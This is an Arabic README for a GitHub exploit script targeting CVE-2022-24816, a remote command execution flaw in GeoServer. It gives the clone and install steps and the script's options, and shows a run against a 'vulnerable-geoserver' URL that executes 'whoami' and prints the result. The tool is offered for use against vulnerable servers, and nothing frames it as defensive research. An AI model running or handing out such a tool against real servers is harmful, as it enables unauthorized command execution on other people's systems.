
# سكربت استغلال لـ CVE-2022-24816 يستهدف GeoServer ينفّذ أوامر عشوائية على الخوادم الضعيفة عبر طلبات HTTP مصمّمة بعناية. يتضمن إدارة التبعيات ومخرجات ملوّنة.
استنساخ المستودع:
git clone https://github.com/c1ph3rbyt3/CVE-2022-24816.git
cd CVE-2022-24816
تثبيت التبعيات: تأكد من تثبيت Python 3. ثم قم بتثبيت التبعيات اللازمة عن طريق تنفيذ:
pip install -r requirements.txt
يتضمن ملف requirements.txt المكتبات التالية:
requestsurllib3colorama-u أو --url: يحدد عنوان URL المستهدف لخادم GeoServer المعرض للثغرة. مثال: http://example.com أو https://example.com.-c أو --command: يحدد الأمر الذي سيتم تنفيذه على النظام المستهدف.تنفيذ السكربت مع أمر محدد:
python CVE-2022-24816.py -u https://vulnerable-geoserver.com -c "whoami"
سيقوم هذا بإرسال الحمولة الخبيثة إلى الخادم المستهدف وعرض مخرجات الأمر على الشاشة.
تم الإنشاء بواسطة: C1ph3rByt3